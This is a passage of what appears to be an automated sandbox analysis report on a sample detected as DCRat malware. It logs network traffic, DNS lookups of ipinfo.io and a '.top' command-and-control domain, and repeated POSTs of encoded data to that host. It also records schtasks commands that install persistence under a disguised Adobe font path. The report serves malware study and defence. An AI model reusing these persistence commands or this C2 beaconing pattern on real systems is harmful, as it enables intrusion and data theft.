Nov 3, 2024 02:31:59.934098959 CET	49730	443	192.168.2.4	34.117.59.81
Nov 3, 2024 02:31:59.949312925 CET	49730	443	192.168.2.4	34.117.59.81
Nov 3, 2024 02:31:59.952003956 CET	49731	443	192.168.2.4	34.117.59.81
Nov 3, 2024 02:31:59.952042103 CET	443	49731	34.117.59.81	192.168.2.4
Nov 3, 2024 02:31:59.952132940 CET	49731	443	192.168.2.4	34.117.59.81
Nov 3, 2024 02:31:59.952552080 CET	49731	443	192.168.2.4	34.117.59.81
Nov 3, 2024 02:31:59.952558994 CET	443	49731	34.117.59.81	192.168.2.4
Nov 3, 2024 02:32:00.745068073 CET	443	49731	34.117.59.81	192.168.2.4
Nov 3, 2024 02:32:00.747169971 CET	49731	443	192.168.2.4	34.117.59.81
Nov 3, 2024 02:32:00.747181892 CET	443	49731	34.117.59.81	192.168.2.4
Nov 3, 2024 02:32:00.953892946 CET	443	49731	34.117.59.81	192.168.2.4
Nov 3, 2024 02:32:00.953967094 CET	443	49731	34.117.59.81	192.168.2.4
Nov 3, 2024 02:32:00.954015970 CET	49731	443	192.168.2.4	34.117.59.81
Nov 3, 2024 02:32:00.964139938 CET	49731	443	192.168.2.4	34.117.59.81
Nov 3, 2024 02:32:00.964152098 CET	443	49731	34.117.59.81	192.168.2.4
Nov 3, 2024 02:32:00.965094090 CET	49732	443	192.168.2.4	34.117.59.81
Nov 3, 2024 02:32:00.965138912 CET	443	49732	34.117.59.81	192.168.2.4
Nov 3, 2024 02:32:00.965204000 CET	49732	443	192.168.2.4	34.117.59.81
Nov 3, 2024 02:32:00.965420961 CET	49732	443	192.168.2.4	34.117.59.81
Nov 3, 2024 02:32:00.965442896 CET	443	49732	34.117.59.81	192.168.2.4
Nov 3, 2024 02:32:01.726993084 CET	443	49732	34.117.59.81	192.168.2.4
Nov 3, 2024 02:32:01.732151985 CET	49732	443	192.168.2.4	34.117.59.81
Nov 3, 2024 02:32:01.732199907 CET	443	49732	34.117.59.81	192.168.2.4
Nov 3, 2024 02:32:01.938709021 CET	443	49732	34.117.59.81	192.168.2.4
Nov 3, 2024 02:32:01.938762903 CET	443	49732	34.117.59.81	192.168.2.4
Nov 3, 2024 02:32:01.938851118 CET	49732	443	192.168.2.4	34.117.59.81
Nov 3, 2024 02:32:01.939083099 CET	49732	443	192.168.2.4	34.117.59.81
Nov 3, 2024 02:32:01.939104080 CET	443	49732	34.117.59.81	192.168.2.4
Nov 3, 2024 02:32:12.653733969 CET	49733	80	192.168.2.4	37.44.238.250
Nov 3, 2024 02:32:12.658699989 CET	80	49733	37.44.238.250	192.168.2.4
Nov 3, 2024 02:32:12.658799887 CET	49733	80	192.168.2.4	37.44.238.250
Nov 3, 2024 02:32:12.659004927 CET	49733	80	192.168.2.4	37.44.238.250
Nov 3, 2024 02:32:12.663904905 CET	80	49733	37.44.238.250	192.168.2.4
Nov 3, 2024 02:32:13.006007910 CET	49733	80	192.168.2.4	37.44.238.250
Nov 3, 2024 02:32:13.011318922 CET	80	49733	37.44.238.250	192.168.2.4
Nov 3, 2024 02:32:13.276298046 CET	80	49733	37.44.238.250	192.168.2.4
Nov 3, 2024 02:32:13.276413918 CET	49733	80	192.168.2.4	37.44.238.250
Nov 3, 2024 02:32:13.284687996 CET	49733	80	192.168.2.4	37.44.238.250
Nov 3, 2024 02:32:13.289632082 CET	80	49733	37.44.238.250	192.168.2.4
Nov 3, 2024 02:32:35.546997070 CET	49740	80	192.168.2.4	37.44.238.250
Nov 3, 2024 02:32:35.552175999 CET	80	49740	37.44.238.250	192.168.2.4
Nov 3, 2024 02:32:35.552397966 CET	49740	80	192.168.2.4	37.44.238.250
Nov 3, 2024 02:32:35.552580118 CET	49740	80	192.168.2.4	37.44.238.250
Nov 3, 2024 02:32:35.557425976 CET	80	49740	37.44.238.250	192.168.2.4
Nov 3, 2024 02:32:35.911551952 CET	49740	80	192.168.2.4	37.44.238.250
Nov 3, 2024 02:32:36.013000011 CET	80	49740	37.44.238.250	192.168.2.4
Nov 3, 2024 02:32:36.148318052 CET	80	49740	37.44.238.250	192.168.2.4
Nov 3, 2024 02:32:36.148391962 CET	49740	80	192.168.2.4	37.44.238.250
Nov 3, 2024 02:32:36.150023937 CET	49740	80	192.168.2.4	37.44.238.250
Nov 3, 2024 02:32:36.154769897 CET	80	49740	37.44.238.250	192.168.2.4
Nov 3, 2024 02:32:43.707391024 CET	49741	80	192.168.2.4	37.44.238.250
Nov 3, 2024 02:32:43.712344885 CET	80	49741	37.44.238.250	192.168.2.4
Nov 3, 2024 02:32:43.712455034 CET	49741	80	192.168.2.4	37.44.238.250
Nov 3, 2024 02:32:43.712655067 CET	49741	80	192.168.2.4	37.44.238.250
Nov 3, 2024 02:32:43.718187094 CET	80	49741	37.44.238.250	192.168.2.4
Nov 3, 2024 02:32:44.071583033 CET	49741	80	192.168.2.4	37.44.238.250
Nov 3, 2024 02:32:44.076522112 CET	80	49741	37.44.238.250	192.168.2.4
Nov 3, 2024 02:32:44.308362961 CET	80	49741	37.44.238.250	192.168.2.4
Nov 3, 2024 02:32:44.308444977 CET	49741	80	192.168.2.4	37.44.238.250
Nov 3, 2024 02:32:44.309870005 CET	49741	80	192.168.2.4	37.44.238.250
Nov 3, 2024 02:32:44.314635038 CET	80	49741	37.44.238.250	192.168.2.4
Nov 3, 2024 02:32:46.020618916 CET	49742	80	192.168.2.4	37.44.238.250
Nov 3, 2024 02:32:46.025816917 CET	80	49742	37.44.238.250	192.168.2.4
Nov 3, 2024 02:32:46.027673006 CET	49742	80	192.168.2.4	37.44.238.250
Nov 3, 2024 02:32:46.027857065 CET	49742	80	192.168.2.4	37.44.238.250
Nov 3, 2024 02:32:46.032676935 CET	80	49742	37.44.238.250	192.168.2.4
Nov 3, 2024 02:32:46.380589008 CET	49742	80	192.168.2.4	37.44.238.250
Nov 3, 2024 02:32:46.385593891 CET	80	49742	37.44.238.250	192.168.2.4
Nov 3, 2024 02:32:46.630846977 CET	80	49742	37.44.238.250	192.168.2.4
Nov 3, 2024 02:32:46.631633997 CET	49742	80	192.168.2.4	37.44.238.250
Nov 3, 2024 02:32:46.640173912 CET	49742	80	192.168.2.4	37.44.238.250
Nov 3, 2024 02:32:46.645052910 CET	80	49742	37.44.238.250	192.168.2.4
Nov 3, 2024 02:32:51.591402054 CET	49743	80	192.168.2.4	37.44.238.250
Nov 3, 2024 02:32:51.596522093 CET	80	49743	37.44.238.250	192.168.2.4
Nov 3, 2024 02:32:51.596632004 CET	49743	80	192.168.2.4	37.44.238.250
Nov 3, 2024 02:32:51.596894979 CET	49743	80	192.168.2.4	37.44.238.250
Nov 3, 2024 02:32:51.601682901 CET	80	49743	37.44.238.250	192.168.2.4
Nov 3, 2024 02:32:51.970544100 CET	49743	80	192.168.2.4	37.44.238.250
Nov 3, 2024 02:32:51.975889921 CET	80	49743	37.44.238.250	192.168.2.4
Nov 3, 2024 02:32:52.215687037 CET	80	49743	37.44.238.250	192.168.2.4
Nov 3, 2024 02:32:52.215984106 CET	49743	80	192.168.2.4	37.44.238.250
Nov 3, 2024 02:32:52.228637934 CET	49743	80	192.168.2.4	37.44.238.250
Nov 3, 2024 02:32:52.233462095 CET	80	49743	37.44.238.250	192.168.2.4
Nov 3, 2024 02:32:53.185497999 CET	49744	80	192.168.2.4	37.44.238.250
Nov 3, 2024 02:32:53.191683054 CET	80	49744	37.44.238.250	192.168.2.4
Nov 3, 2024 02:32:53.191761971 CET	49744	80	192.168.2.4	37.44.238.250
Nov 3, 2024 02:32:53.192019939 CET	49744	80	192.168.2.4	37.44.238.250
Nov 3, 2024 02:32:53.197895050 CET	80	49744	37.44.238.250	192.168.2.4
Nov 3, 2024 02:32:53.536818027 CET	49744	80	192.168.2.4	37.44.238.250
Nov 3, 2024 02:32:53.541924000 CET	80	49744	37.44.238.250	192.168.2.4
Nov 3, 2024 02:32:53.790296078 CET	80	49744	37.44.238.250	192.168.2.4
Nov 3, 2024 02:32:53.791671038 CET	49744	80	192.168.2.4	37.44.238.250
Nov 3, 2024 02:32:53.793617964 CET	49744	80	192.168.2.4	37.44.238.250
Nov 3, 2024 02:32:53.798794985 CET	80	49744	37.44.238.250	192.168.2.4
Nov 3, 2024 02:33:16.072446108 CET	49828	80	192.168.2.4	37.44.238.250
Nov 3, 2024 02:33:16.077318907 CET	80	49828	37.44.238.250	192.168.2.4
Nov 3, 2024 02:33:16.077392101 CET	49828	80	192.168.2.4	37.44.238.250
Nov 3, 2024 02:33:16.077599049 CET	49828	80	192.168.2.4	37.44.238.250
Nov 3, 2024 02:33:16.082381010 CET	80	49828	37.44.238.250	192.168.2.4
Nov 3, 2024 02:33:16.427405119 CET	49828	80	192.168.2.4	37.44.238.250
Nov 3, 2024 02:33:16.510407925 CET	80	49828	37.44.238.250	192.168.2.4
Nov 3, 2024 02:33:16.681304932 CET	80	49828	37.44.238.250	192.168.2.4
Nov 3, 2024 02:33:16.681374073 CET	49828	80	192.168.2.4	37.44.238.250
Nov 3, 2024 02:33:16.683468103 CET	49828	80	192.168.2.4	37.44.238.250
Nov 3, 2024 02:33:16.688447952 CET	80	49828	37.44.238.250	192.168.2.4
Nov 3, 2024 02:33:24.544667959 CET	49865	80	192.168.2.4	37.44.238.250
Nov 3, 2024 02:33:24.549711943 CET	80	49865	37.44.238.250	192.168.2.4
Nov 3, 2024 02:33:24.549782038 CET	49865	80	192.168.2.4	37.44.238.250
Nov 3, 2024 02:33:24.550019979 CET	49865	80	192.168.2.4	37.44.238.250
Nov 3, 2024 02:33:24.555318117 CET	80	49865	37.44.238.250	192.168.2.4
Nov 3, 2024 02:33:24.896123886 CET	49865	80	192.168.2.4	37.44.238.250
Nov 3, 2024 02:33:24.901207924 CET	80	49865	37.44.238.250	192.168.2.4
Nov 3, 2024 02:33:25.144802094 CET	80	49865	37.44.238.250	192.168.2.4
Nov 3, 2024 02:33:25.145277023 CET	49865	80	192.168.2.4	37.44.238.250
Nov 3, 2024 02:33:25.147396088 CET	49865	80	192.168.2.4	37.44.238.250
Nov 3, 2024 02:33:25.154418945 CET	80	49865	37.44.238.250	192.168.2.4
Nov 3, 2024 02:33:26.647394896 CET	49875	80	192.168.2.4	37.44.238.250
Nov 3, 2024 02:33:26.652364969 CET	80	49875	37.44.238.250	192.168.2.4
Nov 3, 2024 02:33:26.652441025 CET	49875	80	192.168.2.4	37.44.238.250
Nov 3, 2024 02:33:26.652626038 CET	49875	80	192.168.2.4	37.44.238.250
Nov 3, 2024 02:33:26.657798052 CET	80	49875	37.44.238.250	192.168.2.4
Nov 3, 2024 02:33:27.005541086 CET	49875	80	192.168.2.4	37.44.238.250
Nov 3, 2024 02:33:27.010691881 CET	80	49875	37.44.238.250	192.168.2.4
Nov 3, 2024 02:33:27.261624098 CET	80	49875	37.44.238.250	192.168.2.4
Nov 3, 2024 02:33:27.261821032 CET	49875	80	192.168.2.4	37.44.238.250
Nov 3, 2024 02:33:27.263362885 CET	49875	80	192.168.2.4	37.44.238.250
Nov 3, 2024 02:33:27.268142939 CET	80	49875	37.44.238.250	192.168.2.4
Nov 3, 2024 02:33:33.038917065 CET	49903	80	192.168.2.4	37.44.238.250
Nov 3, 2024 02:33:33.043865919 CET	80	49903	37.44.238.250	192.168.2.4
Nov 3, 2024 02:33:33.043948889 CET	49903	80	192.168.2.4	37.44.238.250
Nov 3, 2024 02:33:33.044107914 CET	49903	80	192.168.2.4	37.44.238.250
Nov 3, 2024 02:33:33.048863888 CET	80	49903	37.44.238.250	192.168.2.4
Nov 3, 2024 02:33:33.396161079 CET	49903	80	192.168.2.4	37.44.238.250
Nov 3, 2024 02:33:33.401067019 CET	80	49903	37.44.238.250	192.168.2.4
Nov 3, 2024 02:33:33.650760889 CET	80	49903	37.44.238.250	192.168.2.4
Nov 3, 2024 02:33:33.650846958 CET	49903	80	192.168.2.4	37.44.238.250
Nov 3, 2024 02:33:33.652609110 CET	49903	80	192.168.2.4	37.44.238.250
Nov 3, 2024 02:33:33.657478094 CET	80	49903	37.44.238.250	192.168.2.4

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Nov 3, 2024 02:31:58.871872902 CET	58276	53	192.168.2.4	1.1.1.1
Nov 3, 2024 02:31:58.878561020 CET	53	58276	1.1.1.1	192.168.2.4
Nov 3, 2024 02:32:12.263499975 CET	59410	53	192.168.2.4	1.1.1.1
Nov 3, 2024 02:32:12.649569035 CET	53	59410	1.1.1.1	192.168.2.4

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Nov 3, 2024 02:31:58.871872902 CET	192.168.2.4	1.1.1.1	0xc161	Standard query (0)	ipinfo.io	A (IP address)	IN (0x0001)	false
Nov 3, 2024 02:32:12.263499975 CET	192.168.2.4	1.1.1.1	0xe4c7	Standard query (0)	452132cm.n9shteam2.top	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Nov 3, 2024 02:31:58.878561020 CET	1.1.1.1	192.168.2.4	0xc161	No error (0)	ipinfo.io		34.117.59.81	A (IP address)	IN (0x0001)	false
Nov 3, 2024 02:32:12.649569035 CET	1.1.1.1	192.168.2.4	0xe4c7	No error (0)	452132cm.n9shteam2.top		37.44.238.250	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

ipinfo.io

452132cm.n9shteam2.top

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.4	49733	37.44.238.250	80	7616	C:\Program Files (x86)\Windows Portable Devices\lMBSkpoWMYaHkUMNHfb.exe

Timestamp	Bytes transferred	Direction	Data
Nov 3, 2024 02:32:12.659004927 CET	313	OUT	POST /Processdownloads.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36 Host: 452132cm.n9shteam2.top Content-Length: 344 Expect: 100-continue Connection: Keep-Alive
Nov 3, 2024 02:32:13.006007910 CET	344	OUT	Data Raw: 00 06 01 05 06 09 01 02 05 06 02 01 02 04 01 01 00 05 05 0d 02 0d 03 0f 02 51 0f 04 03 0f 01 55 0a 01 07 0e 07 0c 07 0b 0b 05 04 53 07 05 07 02 04 53 0b 00 0d 0e 04 51 04 54 06 56 06 05 04 09 01 0b 0e 0e 06 03 06 03 0f 01 0e 50 0d 54 0f 02 02 05 Data Ascii: QUSSQTVPT\L~kYe_vbTYbeh\|BTYcl`s\|DxBwKl^b}}oUvgh}_~V@@xSnbS

Session ID	Source IP	Source Port	Destination IP	Destination Port
1	192.168.2.4	49740	37.44.238.250	80

Timestamp	Bytes transferred	Direction	Data
Nov 3, 2024 02:32:35.552580118 CET	330	OUT	POST /Processdownloads.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29 Host: 452132cm.n9shteam2.top Content-Length: 344 Expect: 100-continue Connection: Keep-Alive
Nov 3, 2024 02:32:35.911551952 CET	344	OUT	Data Raw: 05 01 04 00 06 0a 04 00 05 06 02 01 02 03 01 0a 00 03 05 0d 02 03 03 08 00 02 0f 51 04 50 00 50 0d 52 03 0b 00 07 07 04 0c 0a 07 06 07 00 05 04 04 01 0e 0b 0a 06 01 0a 01 05 04 0c 06 07 05 0e 02 04 0d 09 06 00 01 04 0d 0e 0e 02 0c 00 0f 02 07 0d Data Ascii: QPPRRW\L~sjw\b]u[UUkeB`Rs]hZt{Ucl^i^ToScds[~O~V@zmv~Lq

Session ID	Source IP	Source Port	Destination IP	Destination Port
2	192.168.2.4	49741	37.44.238.250	80

Timestamp	Bytes transferred	Direction	Data
Nov 3, 2024 02:32:43.712655067 CET	313	OUT	POST /Processdownloads.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Host: 452132cm.n9shteam2.top Content-Length: 344 Expect: 100-continue Connection: Keep-Alive
Nov 3, 2024 02:32:44.071583033 CET	344	OUT	Data Raw: 05 06 01 07 03 0f 04 06 05 06 02 01 02 04 01 0b 00 0b 05 01 02 06 03 08 07 07 0f 53 06 01 06 01 0f 0e 07 00 01 06 04 06 0e 57 04 53 04 0b 04 05 04 56 0e 5e 0c 07 04 52 04 52 05 02 04 00 06 09 03 05 0c 0f 00 06 06 54 0f 05 0e 55 0a 0c 0f 08 05 57 Data Ascii: SWSV^RRTUW\L~kY~cb[aK^\|ic\|cY`kY{odZ{YuZh~p@wtpL~u~V@@z}P}\q

Session ID	Source IP	Source Port	Destination IP	Destination Port
3	192.168.2.4	49742	37.44.238.250	80

Timestamp	Bytes transferred	Direction	Data
Nov 3, 2024 02:32:46.027857065 CET	330	OUT	POST /Processdownloads.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34 Host: 452132cm.n9shteam2.top Content-Length: 344 Expect: 100-continue Connection: Keep-Alive
Nov 3, 2024 02:32:46.380589008 CET	344	OUT	Data Raw: 00 02 04 06 06 09 01 04 05 06 02 01 02 04 01 02 00 0a 05 09 02 04 03 01 03 07 0a 03 04 00 03 03 0c 04 07 0a 00 54 03 05 0b 02 04 07 07 51 04 03 06 50 0d 0a 0f 54 06 05 01 0e 04 57 07 02 00 0e 00 07 0e 00 07 00 07 06 0e 03 0b 06 0f 51 0c 53 02 0d Data Ascii: TQPTWQS[VP\L~^z`bYaetlut\|Y\|MpIxdXl^fK\|~sRtIlOju~V@@xm\N}r[

Session ID	Source IP	Source Port	Destination IP	Destination Port
4	192.168.2.4	49743	37.44.238.250	80

Timestamp	Bytes transferred	Direction	Data
Nov 3, 2024 02:32:51.596894979 CET	277	OUT	POST /Processdownloads.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0 Host: 452132cm.n9shteam2.top Content-Length: 344 Expect: 100-continue Connection: Keep-Alive
Nov 3, 2024 02:32:51.970544100 CET	344	OUT	Data Raw: 05 07 01 06 06 0b 04 00 05 06 02 01 02 07 01 07 00 07 05 0d 02 02 03 09 07 06 0f 06 05 07 03 54 0c 04 03 0f 02 56 06 51 0e 00 05 05 04 01 04 01 06 07 0d 0f 0d 52 05 06 06 05 05 54 07 02 04 0f 00 56 0a 0e 04 00 04 07 0e 55 0b 05 0f 06 0f 01 04 0c Data Ascii: TVQRTVUWX\L~\|pjvbmOvelB~let\|hM\|pcYylUE{`a[\|}x@cYZiO~V@A{}f~\u

Session ID	Source IP	Source Port	Destination IP	Destination Port
5	192.168.2.4	49744	37.44.238.250	80

Timestamp	Bytes transferred	Direction	Data
Nov 3, 2024 02:32:53.192019939 CET	330	OUT	POST /Processdownloads.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29 Host: 452132cm.n9shteam2.top Content-Length: 344 Expect: 100-continue Connection: Keep-Alive
Nov 3, 2024 02:32:53.536818027 CET	344	OUT	Data Raw: 00 05 04 07 03 0c 01 02 05 06 02 01 02 03 01 02 00 04 05 0c 02 01 03 0f 02 05 0a 0d 05 0f 06 03 0f 53 06 5b 02 04 04 55 0d 05 04 03 00 0a 07 0e 07 07 0e 0c 0d 04 05 03 05 04 05 0c 05 03 04 08 01 04 0d 59 05 55 04 55 0f 57 0b 01 0c 07 0d 01 07 56 Data Ascii: S[UYUUWVRUQ\L}Qk^bOvqr^uflho~\vpMcYlU{lYfIkT``IU[~u~V@xmT~bS

Session ID	Source IP	Source Port	Destination IP	Destination Port
6	192.168.2.4	49828	37.44.238.250	80

Timestamp	Bytes transferred	Direction	Data
Nov 3, 2024 02:33:16.077599049 CET	330	OUT	POST /Processdownloads.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Edg/95.0.1020.53 Host: 452132cm.n9shteam2.top Content-Length: 344 Expect: 100-continue Connection: Keep-Alive
Nov 3, 2024 02:33:16.427405119 CET	344	OUT	Data Raw: 00 07 04 07 06 00 01 01 05 06 02 01 02 03 01 04 00 00 05 08 02 0d 03 00 02 04 0e 02 04 0e 02 01 0c 00 07 0e 03 01 07 06 0c 50 02 05 00 00 07 53 04 01 0c 5a 0a 00 01 03 06 0e 06 07 04 00 07 5d 02 00 0e 0c 05 00 01 06 0f 02 0d 06 0e 01 0c 51 06 54 Data Ascii: PSZ]QTSW\L~@Nq[`L_BwulAhlzXvls_k]s^{\|]Hx`bhSUcwk\e~V@{CzAbW

Session ID	Source IP	Source Port	Destination IP	Destination Port
7	192.168.2.4	49865	37.44.238.250	80

Timestamp	Bytes transferred	Direction	Data
Nov 3, 2024 02:33:24.550019979 CET	265	OUT	POST /Processdownloads.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0 Host: 452132cm.n9shteam2.top Content-Length: 344 Expect: 100-continue Connection: Keep-Alive
Nov 3, 2024 02:33:24.896123886 CET	344	OUT	Data Raw: 05 07 01 05 06 01 01 02 05 06 02 01 02 06 01 00 00 02 05 0f 02 02 03 0e 01 0f 0f 04 07 0f 01 52 0d 51 07 0c 00 04 07 0b 0c 57 06 00 05 0a 05 04 07 01 0d 09 0a 06 07 02 01 0e 07 07 01 02 06 00 02 50 0c 0b 04 01 07 06 0c 00 0f 02 0f 04 0d 02 07 53 Data Ascii: RQWPS_\L~sjNt[uBwu]UhU}co\|hMU[{Bc{NPhmptgc_je~V@BxCr~\i

Session ID	Source IP	Source Port	Destination IP	Destination Port
8	192.168.2.4	49875	37.44.238.250	80

Timestamp	Bytes transferred	Direction	Data
Nov 3, 2024 02:33:26.652626038 CET	277	OUT	POST /Processdownloads.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0 Host: 452132cm.n9shteam2.top Content-Length: 344 Expect: 100-continue Connection: Keep-Alive
Nov 3, 2024 02:33:27.005541086 CET	344	OUT	Data Raw: 05 02 01 00 06 01 01 03 05 06 02 01 02 03 01 00 00 07 05 01 02 06 03 01 00 03 0e 0d 06 03 03 55 0f 03 07 0c 03 06 05 02 0d 06 06 05 07 0a 02 0f 07 07 0f 0e 0a 02 05 0a 04 02 04 03 07 02 07 08 01 53 0f 09 05 05 04 52 0e 03 0c 52 0a 07 0f 09 04 01 Data Ascii: USRRSP\L~~pq]tbPXvv`ouwRk_h]o[x{KxNTkC`N`Io]}u~V@xCf}\[

Session ID	Source IP	Source Port	Destination IP	Destination Port
9	192.168.2.4	49903	37.44.238.250	80

Timestamp	Bytes transferred	Direction	Data
Nov 3, 2024 02:33:33.044107914 CET	313	OUT	POST /Processdownloads.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Host: 452132cm.n9shteam2.top Content-Length: 344 Expect: 100-continue Connection: Keep-Alive
Nov 3, 2024 02:33:33.396161079 CET	344	OUT	Data Raw: 00 0b 04 03 06 08 01 05 05 06 02 01 02 01 01 04 00 04 05 01 02 05 03 0b 01 00 0d 0d 06 00 02 01 0c 06 03 0a 00 56 03 07 0f 07 05 0a 04 02 04 03 03 06 0e 0c 0f 54 05 0a 01 05 06 56 04 00 07 0f 00 03 0f 0d 04 06 01 04 0f 01 0e 55 0f 02 0e 53 02 04 Data Ascii: VTVUS^ZWRR\L~A\|`~@trqbvwQhlvXwk\ZlJxosH{`qY}sRvds_e~V@{CT}b}

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.4	49730	34.117.59.81	443	6828	C:\Users\user\Desktop\k1iZHyRK6K.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-03 01:31:59 UTC	61	OUT	GET /ip HTTP/1.1 Host: ipinfo.io Connection: Keep-Alive
2024-11-03 01:31:59 UTC	305	IN	HTTP/1.1 200 OK date: Sun, 03 Nov 2024 01:31:58 GMT content-type: text/plain; charset=utf-8 Content-Length: 13 access-control-allow-origin: * via: 1.1 google strict-transport-security: max-age=2592000; includeSubDomains Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Connection: close
2024-11-03 01:31:59 UTC	13	IN	Data Raw: 39 36 2e 34 34 2e 31 35 31 2e 31 32 33 Data Ascii: 96.44.151.123

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.4	49731	34.117.59.81	443	6828	C:\Users\user\Desktop\k1iZHyRK6K.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-03 01:32:00 UTC	42	OUT	GET /country HTTP/1.1 Host: ipinfo.io

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.4	49732	34.117.59.81	443	6828	C:\Users\user\Desktop\k1iZHyRK6K.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-03 01:32:01 UTC	42	OUT	GET /country HTTP/1.1 Host: ipinfo.io

Target ID:	0
Start time:	21:31:55
Start date:	02/11/2024
Path:	C:\Users\user\Desktop\k1iZHyRK6K.exe
Wow64 process (32bit):	false
Commandline:	"C:\Users\user\Desktop\k1iZHyRK6K.exe"
Imagebase:	0x660000
File size:	875'520 bytes
MD5 hash:	5780DBAE6AC61A88C8D89F216F324146
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: 00000000.00000000.1640485684.0000000000662000.00000002.00000001.01000000.00000003.sdmp, Author: Joe Security
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	1
Start time:	21:31:56
Start date:	02/11/2024
Path:	C:\Windows\System32\schtasks.exe
Wow64 process (32bit):	false
Commandline:	schtasks.exe /create /tn "lMBSkpoWMYaHkUMNHfbl" /sc MINUTE /mo 11 /tr "'C:\Program Files\Adobe\Acrobat DC\Resource\Font\lMBSkpoWMYaHkUMNHfb.exe'" /f
Imagebase:	0x7ff76f990000
File size:	235'008 bytes
MD5 hash:	76CD6626DD8834BD4A42E6A565104DC2
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	2
Start time:	21:31:56
Start date:	02/11/2024
Path:	C:\Windows\System32\schtasks.exe
Wow64 process (32bit):	false
Commandline:	schtasks.exe /create /tn "lMBSkpoWMYaHkUMNHfb" /sc ONLOGON /tr "'C:\Program Files\Adobe\Acrobat DC\Resource\Font\lMBSkpoWMYaHkUMNHfb.exe'" /rl HIGHEST /f
Imagebase:	0x7ff76f990000
File size:	235'008 bytes
MD5 hash:	76CD6626DD8834BD4A42E6A565104DC2
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	3
Start time:	21:31:56
Start date:	02/11/2024
Path:	C:\Windows\System32\schtasks.exe
Wow64 process (32bit):	false
Commandline:	schtasks.exe /create /tn "lMBSkpoWMYaHkUMNHfbl" /sc MINUTE /mo 12 /tr "'C:\Program Files\Adobe\Acrobat DC\Resource\Font\lMBSkpoWMYaHkUMNHfb.exe'" /rl HIGHEST /f
Imagebase:	0x7ff76f990000
File size:	235'008 bytes
MD5 hash:	76CD6626DD8834BD4A42E6A565104DC2
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	4
Start time:	21:31:56
Start date:	02/11/2024
Path:	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\rsqbzofw\rsqbzofw.cmdline"
Imagebase:	0x7ff67b150000
File size:	2'759'232 bytes
MD5 hash:	F65B029562077B648A6A5F6A1AA76A66
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate
Has exited:	true

Show Windows behavior

Target ID:	5
Start time:	21:31:56
Start date:	02/11/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	6
Start time:	21:31:57
Start date:	02/11/2024
Path:	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
Wow64 process (32bit):	false
